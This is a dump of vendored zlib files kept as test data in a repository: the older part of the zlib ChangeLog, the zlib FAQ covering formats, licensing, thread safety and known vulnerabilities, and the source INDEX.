msdos/Makefile.emx, nt/Makefile.emx, nt/Makefile.gcc: new makefiles, for emx (DOS/OS2), emx&rsxnt and mingw32 (Windows 9x / NT) - use define instead of typedef for Bytef also for MSC small/medium (Tom Lane) - replace __far with _far for better portability (Christian Spieler, Tom Lane) - fix test for errno.h in configure (Tim Newsham) Changes in 1.1.2 (19 March 98) - added contrib/minizip, mini zip and unzip based on zlib (Gilles Vollant) See http://www.winimage.com/zLibDll/unzip.html - preinitialize the inflate tables for fixed codes, to make the code completely thread safe (Mark) - some simplifications and slight speed-up to the inflate code (Mark) - fix gzeof on non-compressed files (Allan Schrum) - add -std1 option in configure for OSF1 to fix gzprintf (Martin Mokrejs) - use default value of 4K for Z_BUFSIZE for 16-bit MSDOS (Tim Wegner + Glenn) - added os2/Makefile.def and os2/zlib.def (Andrew Zabolotny) - add shared lib support for UNIX_SV4.2MP (MATSUURA Takanori) - do not wrap extern "C" around system includes (Tom Lane) - mention zlib binding for TCL in README (Andreas Kupries) - added amiga/Makefile.pup for Amiga powerUP SAS/C PPC (Andreas Kleinert) - allow "make install prefix=..." even after configure (Glenn Randers-Pehrson) - allow "configure --prefix $HOME" (Tim Mooney) - remove warnings in example.c and gzio.c (Glenn Randers-Pehrson) - move Makefile.sas to amiga/Makefile.sas Changes in 1.1.1 (27 Feb 98) - fix macros _tr_tally_* in deflate.h for debug mode (Glenn Randers-Pehrson) - remove block truncation heuristic which had very marginal effect for zlib (smaller lit_bufsize than in gzip 1.2.4) and degraded a little the compression ratio on some files.
This also allows inlining _tr_tally for matches in deflate_slow - added msdos/Makefile.w32 for WIN32 Microsoft Visual C++ (Bob Frazier) Changes in 1.1.0 (24 Feb 98) - do not return STREAM_END prematurely in inflate (John Bowler) - revert to the zlib 1.0.8 inflate to avoid the gcc 2.8.0 bug (Jeremy Buhler) - compile with -DFASTEST to get compression code optimized for speed only - in minigzip, try mmap'ing the input file first (Miguel Albrecht) - increase size of I/O buffers in minigzip.c and gzio.c (not a big gain on Sun but significant on HP) - add a pointer to experimental unzip library in README (Gilles Vollant) - initialize variable gcc in configure (Chris Herborth) Changes in 1.0.9 (17 Feb 1998) - added gzputs and gzgets functions - do not clear eof flag in gzseek (Mark Diekhans) - fix gzseek for files in transparent mode (Mark Diekhans) - do not assume that vsprintf returns the number of bytes written (Jens Krinke) - replace EXPORT with ZEXPORT to avoid conflict with other programs - added compress2 in zconf.h, zlib.def, zlib.dnt - new asm code from Gilles Vollant in contrib/asm386 - simplify the inflate code (Mark): . Replace ZALLOC's in huft_build() with single ZALLOC in inflate_blocks_new() . ZALLOC the length list in inflate_trees_fixed() instead of using stack . ZALLOC the value area for huft_build() instead of using stack . 
Simplify Z_FINISH check in inflate() - Avoid gcc 2.8.0 comparison bug a little differently than zlib 1.0.8 - in inftrees.c, avoid cc -O bug on HP (Farshid Elahi) - in zconf.h move the ZLIB_DLL stuff earlier to avoid problems with the declaration of FAR (Gilles Vollant) - install libz.so* with mode 755 (executable) instead of 644 (Marc Lehmann) - read_buf buf parameter of type Bytef* instead of charf* - zmemcpy parameters are of type Bytef*, not charf* (Joseph Strout) - do not redeclare unlink in minigzip.c for WIN32 (John Bowler) - fix check for presence of directories in "make install" (Ian Willis) Changes in 1.0.8 (27 Jan 1998) - fixed offsets in contrib/asm386/gvmat32.asm (Gilles Vollant) - fix gzgetc and gzputc for big endian systems (Markus Oberhumer) - added compress2() to allow setting the compression level - include sys/types.h to get off_t on some systems (Marc Lehmann & QingLong) - use constant arrays for the static trees in trees.c instead of computing them at run time (thanks to Ken Raeburn for this suggestion). 
To create trees.h, compile with GEN_TREES_H and run "make test" - check return code of example in "make test" and display result - pass minigzip command line options to file_compress - simplifying code of inflateSync to avoid gcc 2.8 bug - support CC="gcc -Wall" in configure -s (QingLong) - avoid a flush caused by ftell in gzopen for write mode (Ken Raeburn) - fix test for shared library support to avoid compiler warnings - zlib.lib -> zlib.dll in msdos/zlib.rc (Gilles Vollant) - check for TARGET_OS_MAC in addition to MACOS (Brad Pettit) - do not use fdopen for Metrowerks on Mac (Brad Pettit) - add checks for gzputc and gzputc in example.c - avoid warnings in gzio.c and deflate.c (Andreas Kleinert) - use const for the CRC table (Ken Raeburn) - fixed "make uninstall" for shared libraries - use Tracev instead of Trace in infblock.c - in example.c use correct compressed length for test_sync - suppress +vnocompatwarnings in configure for HPUX (not always supported) Changes in 1.0.7 (20 Jan 1998) - fix gzseek which was broken in write mode - return error for gzseek to negative absolute position - fix configure for Linux (Chun-Chung Chen) - increase stack space for MSC (Tim Wegner) - get_crc_table and inflateSyncPoint are EXPORTed (Gilles Vollant) - define EXPORTVA for gzprintf (Gilles Vollant) - added man page zlib.3 (Rick Rodgers) - for contrib/untgz, fix makedir() and improve Makefile - check gzseek in write mode in example.c - allocate extra buffer for seeks only if gzseek is actually called - avoid signed/unsigned comparisons (Tim Wegner, Gilles Vollant) - add inflateSyncPoint in zconf.h - fix list of exported functions in nt/zlib.dnt and msdos/zlib.def Changes in 1.0.6 (19 Jan 1998) - add functions gzprintf, gzputc, gzgetc, gztell, gzeof, gzseek, gzrewind and gzsetparams (thanks to Roland Giersig and Kevin Ruland for some of this code) - Fix a deflate bug occurring only with compression level 0 (thanks to Andy Buckler for finding this one) - In minigzip, pass
transparently also the first byte for .Z files - return Z_BUF_ERROR instead of Z_OK if output buffer full in uncompress() - check Z_FINISH in inflate (thanks to Marc Schluper) - Implement deflateCopy (thanks to Adam Costello) - make static libraries by default in configure, add --shared option - move MSDOS or Windows specific files to directory msdos - suppress the notion of partial flush to simplify the interface (but the symbol Z_PARTIAL_FLUSH is kept for compatibility with 1.0.4) - suppress history buffer provided by application to simplify the interface (this feature was not implemented anyway in 1.0.4) - next_in and avail_in must be initialized before calling inflateInit or inflateInit2 - add EXPORT in all exported functions (for Windows DLL) - added Makefile.nt (thanks to Stephen Williams) - added the unsupported "contrib" directory: contrib/asm386/ by Gilles Vollant 386 asm code replacing longest_match() contrib/iostream/ by Kevin Ruland A C++ I/O streams interface to the zlib gz* functions contrib/iostream2/ by Tyge Løvset Another C++ I/O streams interface contrib/untgz/ by "Pedro A. 
Aranda Gutiérrez" A very simple tar.gz file extractor using zlib contrib/visual-basic.txt by Carlos Rios How to use compress(), uncompress() and the gz* functions from VB - pass params -f (filtered data), -h (huffman only), -1 to -9 (compression level) in minigzip (thanks to Tom Lane) - use const for rommable constants in deflate - added test for gzseek and gztell in example.c - add undocumented function inflateSyncPoint() (hack for Paul Mackerras) - add undocumented function zError to convert error code to string (for Tim Smithers) - Allow compilation of gzio with -DNO_DEFLATE to avoid the compression code - Use default memcpy for Symantec MSDOS compiler - Add EXPORT keyword for check_func (needed for Windows DLL) - add current directory to LD_LIBRARY_PATH for "make test" - create also a link for libz.so.1 - added support for FUJITSU UXP/DS (thanks to Toshiaki Nomura) - use $(SHAREDLIB) instead of libz.so in Makefile.in (for HPUX) - added -soname for Linux in configure (Chun-Chung Chen) - assign numbers to the exported functions in zlib.def (for Windows DLL) - add advice in zlib.h for best usage of deflateSetDictionary - work around compiler bug on Atari (cast Z_NULL in call of s->checkfn) - allow compilation with ANSI keywords only enabled for TurboC in large model - avoid "versionString"[0] (Borland bug) - add NEED_DUMMY_RETURN for Borland - use variable z_verbose for tracing in debug mode (L. Peter Deutsch) - allow compilation with CC - defined STDC for OS/2 (David Charlap) - limit external names to 8 chars for MVS (Thomas Lund) - in minigzip.c, use static buffers only for 16-bit systems - fix suffix check for "minigzip -d foo.gz" - do not return an error for the 2nd of two consecutive gzflush() (Felix Lee) - use _fdopen instead of fdopen for MSC >= 6.0 (Thomas Fanslau) - added makelcc.bat for lcc-win32 (Tom St Denis) - in Makefile.dj2, use copy and del instead of install and rm (Frank Donahoe) - Avoid expanded $Id$.
Use "rcs -kb" or "cvs admin -kb" to avoid Id expansion - check for unistd.h in configure (for off_t) - remove useless check parameter in inflate_blocks_free - avoid useless assignment of s->check to itself in inflate_blocks_new - do not flush twice in gzclose (thanks to Ken Raeburn) - rename FOPEN as F_OPEN to avoid clash with /usr/include/sys/file.h - use NO_ERRNO_H instead of enumeration of operating systems with errno.h - work around buggy fclose on pipes for HP/UX - support zlib DLL with BORLAND C++ 5.0 (thanks to Glenn Randers-Pehrson) - fix configure if CC is already equal to gcc Changes in 1.0.5 (3 Jan 98) - Fix inflate to terminate gracefully when fed corrupted or invalid data - Use const for rommable constants in inflate - Eliminate memory leaks on error conditions in inflate - Removed some vestigial code in inflate - Update web address in README Changes in 1.0.4 (24 Jul 96) - In very rare conditions, deflate(s, Z_FINISH) could fail to produce an EOF bit, so the decompressor could decompress all the correct data but went on to attempt decompressing extra garbage data. This affected minigzip too - zlibVersion and gzerror return const char* (needed for DLL) - port to RISCOS (no fdopen, no multiple dots, no unlink, no fileno) - use z_error only for DEBUG (avoid problem with DLLs) Changes in 1.0.3 (2 Jul 96) - use z_streamp instead of z_stream *, which is now a far pointer in MSDOS small and medium models; this makes the library incompatible with previous versions for these models. (No effect in large model or on other systems.) - return OK instead of BUF_ERROR if previous deflate call returned with avail_out as zero but there is nothing to do - added memcmp for non STDC compilers - define NO_DUMMY_DECL for more Mac compilers (.h files merged incorrectly) - define __32BIT__ if __386__ or i386 is defined (pb. 
with Watcom and SCO) - better check for 16-bit mode MSC (avoids problem with Symantec) Changes in 1.0.2 (23 May 96) - added Windows DLL support - added a function zlibVersion (for the DLL support) - fixed declarations using Bytef in infutil.c (pb with MSDOS medium model) - Bytef is define's instead of typedef'd only for Borland C - avoid reading uninitialized memory in example.c - mention in README that the zlib format is now RFC1950 - updated Makefile.dj2 - added algorithm.doc Changes in 1.0.1 (20 May 96) [1.0 skipped to avoid confusion] - fix array overlay in deflate.c which sometimes caused bad compressed data - fix inflate bug with empty stored block - fix MSDOS medium model which was broken in 0.99 - fix deflateParams() which could generate bad compressed data - Bytef is define'd instead of typedef'ed (work around Borland bug) - added an INDEX file - new makefiles for DJGPP (Makefile.dj2), 32-bit Borland (Makefile.b32), Watcom (Makefile.wat), Amiga SAS/C (Makefile.sas) - speed up adler32 for modern machines without auto-increment - added -ansi for IRIX in configure - static_init_done in trees.c is an int - define unlink as delete for VMS - fix configure for QNX - add configure branch for SCO and HPUX - avoid many warnings (unused variables, dead assignments, etc...) 
- no fdopen for BeOS - fix the Watcom fix for 32 bit mode (define FAR as empty) - removed redefinition of Byte for MKWERKS - work around an MWKERKS bug (incorrect merge of all .h files) Changes in 0.99 (27 Jan 96) - allow preset dictionary shared between compressor and decompressor - allow compression level 0 (no compression) - add deflateParams in zlib.h: allow dynamic change of compression level and compression strategy - test large buffers and deflateParams in example.c - add optional "configure" to build zlib as a shared library - suppress Makefile.qnx, use configure instead - fixed deflate for 64-bit systems (detected on Cray) - fixed inflate_blocks for 64-bit systems (detected on Alpha) - declare Z_DEFLATED in zlib.h (possible parameter for deflateInit2) - always return Z_BUF_ERROR when deflate() has nothing to do - deflateInit and inflateInit are now macros to allow version checking - prefix all global functions and types with z_ with -DZ_PREFIX - make falloc completely reentrant (inftrees.c) - fixed very unlikely race condition in ct_static_init - free in reverse order of allocation to help memory manager - use zlib-1.0/* instead of zlib/* inside the tar.gz - make zlib warning-free with "gcc -O3 -Wall -Wwrite-strings -Wpointer-arith -Wconversion -Wstrict-prototypes -Wmissing-prototypes" - allow gzread on concatenated .gz files - deflateEnd now returns Z_DATA_ERROR if it was premature - deflate is finally (?) 
fully deterministic (no matches beyond end of input) - Document Z_SYNC_FLUSH - add uninstall in Makefile - Check for __cpluplus in zlib.h - Better test in ct_align for partial flush - avoid harmless warnings for Borland C++ - initialize hash_head in deflate.c - avoid warning on fdopen (gzio.c) for HP cc -Aa - include stdlib.h for STDC compilers - include errno.h for Cray - ignore error if ranlib doesn't exist - call ranlib twice for NeXTSTEP - use exec_prefix instead of prefix for libz.a - renamed ct_* as _tr_* to avoid conflict with applications - clear z->msg in inflateInit2 before any error return - initialize opaque in example.c, gzio.c, deflate.c and inflate.c - fixed typo in zconf.h (_GNUC__ => __GNUC__) - check for WIN32 in zconf.h and zutil.c (avoid farmalloc in 32-bit mode) - fix typo in Make_vms.com (f$trnlnm -> f$getsyi) - in fcalloc, normalize pointer if size > 65520 bytes - don't use special fcalloc for 32 bit Borland C++ - use STDC instead of __GO32__ to avoid redeclaring exit, calloc, etc. - use Z_BINARY instead of BINARY - document that gzclose after gzdopen will close the file - allow "a" as mode in gzopen - fix error checking in gzread - allow skipping .gz extra-field on pipes - added reference to Perl interface in README - put the crc table in FAR data (I dislike more and more the medium model :) - added get_crc_table - added a dimension to all arrays (Borland C can't count) - workaround Borland C bug in declaration of inflate_codes_new & inflate_fast - guard against multiple inclusion of *.h (for precompiled header on Mac) - Watcom C pretends to be Microsoft C small model even in 32 bit mode - don't use unsized arrays to avoid silly warnings by Visual C++: warning C4746: 'inflate_mask' : unsized array treated as '__far' (what's wrong with far data in far model?) 
- define enum out of inflate_blocks_state to allow compilation with C++ Changes in 0.95 (16 Aug 95) - fix MSDOS small and medium model (now easier to adapt to any compiler) - inlined send_bits - fix the final (:-) bug for deflate with flush (output was correct but not completely flushed in rare occasions) - default window size is same for compression and decompression (it's now sufficient to set MAX_WBITS in zconf.h) - voidp -> voidpf and voidnp -> voidp (for consistency with other typedefs and because voidnp was not near in large model) Changes in 0.94 (13 Aug 95) - support MSDOS medium model - fix deflate with flush (could sometimes generate bad output) - fix deflateReset (zlib header was incorrectly suppressed) - added support for VMS - allow a compression level in gzopen() - gzflush now calls fflush - For deflate with flush, flush even if no more input is provided - rename libgz.a as libz.a - avoid complex expression in infcodes.c triggering Turbo C bug - work around a problem with gcc on Alpha (in INSERT_STRING) - don't use inline functions (problem with some gcc versions) - allow renaming of Byte, uInt, etc... 
with #define - avoid warning about (unused) pointer before start of array in deflate.c - avoid various warnings in gzio.c, example.c, infblock.c, adler32.c, zutil.c - avoid reserved word 'new' in trees.c Changes in 0.93 (25 June 95) - temporarily disable inline functions - make deflate deterministic - give enough lookahead for PARTIAL_FLUSH - Set binary mode for stdin/stdout in minigzip.c for OS/2 - don't even use signed char in inflate (not portable enough) - fix inflate memory leak for segmented architectures Changes in 0.92 (3 May 95) - don't assume that char is signed (problem on SGI) - Clear bit buffer when starting a stored block - no memcpy on Pyramid - suppressed inftest.c - optimized fill_window, put longest_match inline for gcc - optimized inflate on stored blocks - untabify all sources to simplify patches Changes in 0.91 (2 May 95) - Default MEM_LEVEL is 8 (not 9 for Unix) as documented in zlib.h - Document the memory requirements in zconf.h - added "make install" - fix sync search logic in inflateSync - deflate(Z_FULL_FLUSH) now works even if output buffer too short - after inflateSync, don't scare people with just "lo world" - added support for DJGPP Changes in 0.9 (1 May 95) - don't assume that zalloc clears the allocated memory (the TurboC bug was Mark's bug after all :) - let again gzread copy uncompressed data unchanged (was working in 0.71) - deflate(Z_FULL_FLUSH), inflateReset and inflateSync are now fully implemented - added a test of inflateSync in example.c - moved MAX_WBITS to zconf.h because users might want to change that - document explicitly that zalloc(64K) on MSDOS must return a normalized pointer (zero offset) - added Makefiles for Microsoft C, Turbo C, Borland C++ - faster crc32() Changes in 0.8 (29 April 95) - added fast inflate (inffast.c) - deflate(Z_FINISH) now returns Z_STREAM_END when done. 
Warning: this is incompatible with previous versions of zlib which returned Z_OK - work around a TurboC compiler bug (bad code for b << 0, see infutil.h) (actually that was not a compiler bug, see 0.81 above) - gzread no longer reads one extra byte in certain cases - In gzio destroy(), don't reference a freed structure - avoid many warnings for MSDOS - avoid the ERROR symbol which is used by MS Windows Changes in 0.71 (14 April 95) - Fixed more MSDOS compilation problems :( There is still a bug with TurboC large model Changes in 0.7 (14 April 95) - Added full inflate support - Simplified the crc32() interface. The pre- and post-conditioning (one's complement) is now done inside crc32(). WARNING: this is incompatible with previous versions; see zlib.h for the new usage Changes in 0.61 (12 April 95) - workaround for a bug in TurboC. example and minigzip now work on MSDOS Changes in 0.6 (11 April 95) - added minigzip.c - added gzdopen to reopen a file descriptor as gzFile - added transparent reading of non-gziped files in gzread - fixed bug in gzread (don't read crc as data) - fixed bug in destroy (gzio.c) (don't return Z_STREAM_END for gzclose) - don't allocate big arrays in the stack (for MSDOS) - fix some MSDOS compilation problems Changes in 0.5: - do real compression in deflate.c. 
Z_PARTIAL_FLUSH is supported but not yet Z_FULL_FLUSH - support decompression but only in a single step (forced Z_FINISH) - added opaque object for zalloc and zfree - added deflateReset and inflateReset - added a variable zlib_version for consistency checking - renamed the 'filter' parameter of deflateInit2 as 'strategy' Added Z_FILTERED and Z_HUFFMAN_ONLY constants Changes in 0.4: - avoid "zip" everywhere, use zlib instead of ziplib - suppress Z_BLOCK_FLUSH, interpret Z_PARTIAL_FLUSH as block flush if compression method == 8 - added adler32 and crc32 - renamed deflateOptions as deflateInit2, call one or the other but not both - added the method parameter for deflateInit2 - added inflateInit2 - simplified considerably deflateInit and inflateInit by not supporting user-provided history buffer. This is supported only in deflateInit2 and inflateInit2 Changes in 0.3: - prefix all macro names with Z_ - use Z_FINISH instead of deflateEnd to finish compression - added Z_HUFFMAN_ONLY - added gzerror() ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/FAQ ================================================ Frequently Asked Questions about zlib If your question is not there, please check the zlib home page http://zlib.net/ which may have more recent information. The latest zlib FAQ is at http://zlib.net/zlib_faq.html 1. Is zlib Y2K-compliant? Yes. zlib doesn't handle dates. 2. Where can I get a Windows DLL version? The zlib sources can be compiled without change to produce a DLL. See the file win32/DLL_FAQ.txt in the zlib distribution. Pointers to the precompiled DLL are found in the zlib web site at http://zlib.net/ . 3. Where can I get a Visual Basic interface to zlib? See * http://marknelson.us/1997/01/01/zlib-engine/ * win32/DLL_FAQ.txt in the zlib distribution 4. compress() returns Z_BUF_ERROR. 
Make sure that before the call of compress(), the length of the compressed buffer is equal to the available size of the compressed buffer and not zero. For Visual Basic, check that this parameter is passed by reference ("as any"), not by value ("as long"). 5. deflate() or inflate() returns Z_BUF_ERROR. Before making the call, make sure that avail_in and avail_out are not zero. When setting the parameter flush equal to Z_FINISH, also make sure that avail_out is big enough to allow processing all pending input. Note that a Z_BUF_ERROR is not fatal--another call to deflate() or inflate() can be made with more input or output space. A Z_BUF_ERROR may in fact be unavoidable depending on how the functions are used, since it is not possible to tell whether or not there is more output pending when strm.avail_out returns with zero. See http://zlib.net/zlib_how.html for a heavily annotated example. 6. Where's the zlib documentation (man pages, etc.)? It's in zlib.h . Examples of zlib usage are in the files test/example.c and test/minigzip.c, with more in examples/ . 7. Why don't you use GNU autoconf or libtool or ...? Because we would like to keep zlib as a very small and simple package. zlib is rather portable and doesn't need much configuration. 8. I found a bug in zlib. Most of the time, such problems are due to an incorrect usage of zlib. Please try to reproduce the problem with a small program and send the corresponding source to us at zlib@gzip.org . Do not send multi-megabyte data files without prior agreement. 9. Why do I get "undefined reference to gzputc"? If "make test" produces something like example.o(.text+0x154): undefined reference to `gzputc' check that you don't have old files libz.* in /usr/lib, /usr/local/lib or /usr/X11R6/lib. Remove any old versions, then do "make install". 10. I need a Delphi interface to zlib. See the contrib/delphi directory in the zlib distribution. 11. Can zlib handle .zip archives? Not by itself, no. 
See the directory contrib/minizip in the zlib distribution. 12. Can zlib handle .Z files? No, sorry. You have to spawn an uncompress or gunzip subprocess, or adapt the code of uncompress on your own. 13. How can I make a Unix shared library? By default a shared (and a static) library is built for Unix. So: make distclean ./configure make 14. How do I install a shared zlib library on Unix? After the above, then: make install However, many flavors of Unix come with a shared zlib already installed. Before going to the trouble of compiling a shared version of zlib and trying to install it, you may want to check if it's already there! If you can #include <zlib.h>, it's there. The -lz option will probably link to it. You can check the version at the top of zlib.h or with the ZLIB_VERSION symbol defined in zlib.h . 15. I have a question about OttoPDF. We are not the authors of OttoPDF. The real author is on the OttoPDF web site: Joel Hainley, jhainley@myndkryme.com. 16. Can zlib decode Flate data in an Adobe PDF file? Yes. See http://www.pdflib.com/ . To modify PDF forms, see http://sourceforge.net/projects/acroformtool/ . 17. Why am I getting this "register_frame_info not found" error on Solaris? After installing zlib 1.1.4 on Solaris 2.6, running applications using zlib generates an error such as: ld.so.1: rpm: fatal: relocation error: file /usr/local/lib/libz.so: symbol __register_frame_info: referenced symbol not found The symbol __register_frame_info is not part of zlib, it is generated by the C compiler (cc or gcc). You must recompile applications using zlib which have this problem. This problem is specific to Solaris. See http://www.sunfreeware.com for Solaris versions of zlib and applications using zlib. 18. Why does gzip give an error on a file I make with compress/deflate? The compress and deflate functions produce data in the zlib format, which is different and incompatible with the gzip format. The gz* functions in zlib on the other hand use the gzip format.
Both the zlib and gzip formats use the same compressed data format internally, but have different headers and trailers around the compressed data. 19. Ok, so why are there two different formats? The gzip format was designed to retain the directory information about a single file, such as the name and last modification date. The zlib format on the other hand was designed for in-memory and communication channel applications, and has a much more compact header and trailer and uses a faster integrity check than gzip. 20. Well that's nice, but how do I make a gzip file in memory? You can request that deflate write the gzip format instead of the zlib format using deflateInit2(). You can also request that inflate decode the gzip format using inflateInit2(). Read zlib.h for more details. 21. Is zlib thread-safe? Yes. However any library routines that zlib uses and any application- provided memory allocation routines must also be thread-safe. zlib's gz* functions use stdio library routines, and most of zlib's functions use the library memory allocation routines by default. zlib's *Init* functions allow for the application to provide custom memory allocation routines. Of course, you should only operate on any given zlib or gzip stream from a single thread at a time. 22. Can I use zlib in my commercial application? Yes. Please read the license in zlib.h. 23. Is zlib under the GNU license? No. Please read the license in zlib.h. 24. The license says that altered source versions must be "plainly marked". So what exactly do I need to do to meet that requirement? You need to change the ZLIB_VERSION and ZLIB_VERNUM #defines in zlib.h. In particular, the final version number needs to be changed to "f", and an identification string should be appended to ZLIB_VERSION. Version numbers x.x.x.f are reserved for modifications to zlib by others than the zlib maintainers. 
For example, if the version of the base zlib you are altering is "1.2.3.4", then in zlib.h you should change ZLIB_VERNUM to 0x123f, and ZLIB_VERSION to something like "1.2.3.f-zachary-mods-v3". You can also update the version strings in deflate.c and inftrees.c. For altered source distributions, you should also note the origin and nature of the changes in zlib.h, as well as in ChangeLog and README, along with the dates of the alterations. The origin should include at least your name (or your company's name), and an email address to contact for help or issues with the library. Note that distributing a compiled zlib library along with zlib.h and zconf.h is also a source distribution, and so you should change ZLIB_VERSION and ZLIB_VERNUM and note the origin and nature of the changes in zlib.h as you would for a full source distribution. 25. Will zlib work on a big-endian or little-endian architecture, and can I exchange compressed data between them? Yes and yes. 26. Will zlib work on a 64-bit machine? Yes. It has been tested on 64-bit machines, and has no dependence on any data types being limited to 32-bits in length. If you have any difficulties, please provide a complete problem report to zlib@gzip.org 27. Will zlib decompress data from the PKWare Data Compression Library? No. The PKWare DCL uses a completely different compressed data format than does PKZIP and zlib. However, you can look in zlib's contrib/blast directory for a possible solution to your problem. 28. Can I access data randomly in a compressed stream? No, not without some preparation. If when compressing you periodically use Z_FULL_FLUSH, carefully write all the pending data at those points, and keep an index of those locations, then you can start decompression at those points. You have to be careful to not use Z_FULL_FLUSH too often, since it can significantly degrade compression. Alternatively, you can scan a deflate stream once to generate an index, and then use that index for random access. 
See examples/zran.c . 29. Does zlib work on MVS, OS/390, CICS, etc.? It has in the past, but we have not heard of any recent evidence. There were working ports of zlib 1.1.4 to MVS, but those links no longer work. If you know of recent, successful applications of zlib on these operating systems, please let us know. Thanks. 30. Is there some simpler, easier to read version of inflate I can look at to understand the deflate format? First off, you should read RFC 1951. Second, yes. Look in zlib's contrib/puff directory. 31. Does zlib infringe on any patents? As far as we know, no. In fact, that was originally the whole point behind zlib. Look here for some more information: http://www.gzip.org/#faq11 32. Can zlib work with greater than 4 GB of data? Yes. inflate() and deflate() will process any amount of data correctly. Each call of inflate() or deflate() is limited to input and output chunks of the maximum value that can be stored in the compiler's "unsigned int" type, but there is no limit to the number of chunks. Note however that the strm.total_in and strm.total_out counters may be limited to 4 GB. These counters are provided as a convenience and are not used internally by inflate() or deflate(). The application can easily set up its own counters updated after each call of inflate() or deflate() to count beyond 4 GB. compress() and uncompress() may be limited to 4 GB, since they operate in a single call. gzseek() and gztell() may be limited to 4 GB depending on how zlib is compiled. See the zlibCompileFlags() function in zlib.h. The word "may" appears several times above since there is a 4 GB limit only if the compiler's "long" type is 32 bits. If the compiler's "long" type is 64 bits, then the limit is 16 exabytes. 33. Does zlib have any security vulnerabilities? The only one that we are aware of is potentially in gzprintf().
If zlib is compiled to use sprintf() or vsprintf(), then there is no protection against a buffer overflow of an 8K string space (or other value as set by gzbuffer()), other than the caller of gzprintf() ensuring that the output will not exceed 8K. On the other hand, if zlib is compiled to use snprintf() or vsnprintf(), which should normally be the case, then there is no vulnerability. The ./configure script will display warnings if an insecure variation of sprintf() will be used by gzprintf(). Also the zlibCompileFlags() function will return information on what variant of sprintf() is used by gzprintf(). If you don't have snprintf() or vsnprintf() and would like one, you can find a portable implementation here: http://www.ijs.si/software/snprintf/ Note that you should be using the most recent version of zlib. Versions 1.1.3 and before were subject to a double-free vulnerability, and versions 1.2.1 and 1.2.2 were subject to an access exception when decompressing invalid compressed data. 34. Is there a Java version of zlib? Probably what you want is to use zlib in Java. zlib is already included as part of the Java SDK in the java.util.zip package. If you really want a version of zlib written in the Java language, look on the zlib home page for links: http://zlib.net/ . 35. I get this or that compiler or source-code scanner warning when I crank it up to maximally-pedantic. Can't you guys write proper code? Many years ago, we gave up attempting to avoid warnings on every compiler in the universe. It just got to be a waste of time, and some compilers were downright silly and also contradicted each other. So now, we simply make sure that the code always works. 36. Valgrind (or some similar memory access checker) says that deflate is performing a conditional jump that depends on an uninitialized value. Isn't that a bug? No. That is intentional for performance reasons, and the output of deflate is not affected.
This only started showing up recently since zlib 1.2.x uses malloc() by default for allocations, whereas earlier versions used calloc(), which zeros out the allocated memory. Even though the code was correct, versions 1.2.4 and later were changed to not stimulate these checkers. 37. Will zlib read the (insert any ancient or arcane format here) compressed data format? Probably not. Look in the comp.compression FAQ for pointers to various formats and associated software. 38. How can I encrypt/decrypt zip files with zlib? zlib doesn't support encryption. The original PKZIP encryption is very weak and can be broken with freely available programs. To get strong encryption, use GnuPG, http://www.gnupg.org/ , which already includes zlib compression. For PKZIP compatible "encryption", look at http://www.info-zip.org/ 39. What's the difference between the "gzip" and "deflate" HTTP 1.1 encodings? "gzip" is the gzip format, and "deflate" is the zlib format. They should probably have called the second one "zlib" instead to avoid confusion with the raw deflate compressed data format. While the HTTP 1.1 RFC 2616 correctly points to the zlib specification in RFC 1950 for the "deflate" transfer encoding, there have been reports of servers and browsers that incorrectly produce or expect raw deflate data per the deflate specification in RFC 1951, most notably Microsoft. So even though the "deflate" transfer encoding using the zlib format would be the more efficient approach (and in fact exactly what the zlib format was designed for), using the "gzip" transfer encoding is probably more reliable due to an unfortunate choice of name on the part of the HTTP 1.1 authors. Bottom line: use the gzip format for HTTP 1.1 encoding. 40. Does zlib support the new "Deflate64" format introduced by PKWare? No. PKWare has apparently decided to keep that format proprietary, since they have not documented it as they have previous compression formats.
In any case, the compression improvements are so modest compared to other more modern approaches, that it's not worth the effort to implement. 41. I'm having a problem with the zip functions in zlib, can you help? There are no zip functions in zlib. You are probably using minizip by Gilles Vollant, which is found in the contrib directory of zlib. It is not part of zlib. In fact none of the stuff in contrib is part of zlib. The files in there are not supported by the zlib authors. You need to contact the authors of the respective contribution for help. 42. The match.asm code in contrib is under the GNU General Public License. Since it's part of zlib, doesn't that mean that all of zlib falls under the GNU GPL? No. The files in contrib are not part of zlib. They were contributed by other authors and are provided as a convenience to the user within the zlib distribution. Each item in contrib has its own license. 43. Is zlib subject to export controls? What is its ECCN? zlib is not subject to export controls, and so is classified as EAR99. 44. Can you please sign these lengthy legal documents and fax them back to us so that we can use your software in our product? No. Go away. Shoo.
================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/INDEX ================================================ CMakeLists.txt cmake build file ChangeLog history of changes FAQ Frequently Asked Questions about zlib INDEX this file Makefile dummy Makefile that tells you to ./configure Makefile.in template for Unix Makefile README guess what configure configure script for Unix make_vms.com makefile for VMS test/example.c zlib usages examples for build testing test/minigzip.c minimal gzip-like functionality for build testing test/infcover.c inf*.c code coverage for build coverage testing treebuild.xml XML description of source file dependencies zconf.h.cmakein zconf.h template for cmake zconf.h.in zconf.h template for configure zlib.3 Man page for zlib zlib.3.pdf Man page in PDF format zlib.map Linux symbol information zlib.pc.in Template for pkg-config descriptor zlib.pc.cmakein zlib.pc template for cmake zlib2ansi perl script to convert source files for C++ compilation amiga/ makefiles for Amiga SAS C as400/ makefiles for AS/400 doc/ documentation for formats and algorithms msdos/ makefiles for MSDOS nintendods/ makefile for Nintendo DS old/ makefiles for various architectures and zlib documentation files that have not yet been updated for zlib 1.2.x qnx/ makefiles for QNX watcom/ makefiles for OpenWatcom win32/ makefiles for Windows zlib public header files (required for library use): zconf.h zlib.h private source files used to build the zlib library: adler32.c compress.c crc32.c crc32.h deflate.c deflate.h gzclose.c gzguts.h gzlib.c gzread.c gzwrite.c infback.c inffast.c inffast.h inffixed.h inflate.c inflate.h inftrees.c inftrees.h trees.c trees.h uncompr.c zutil.c zutil.h source files for sample programs See examples/README.examples unsupported contributions by third parties See contrib/README.contrib ================================================ FILE: 
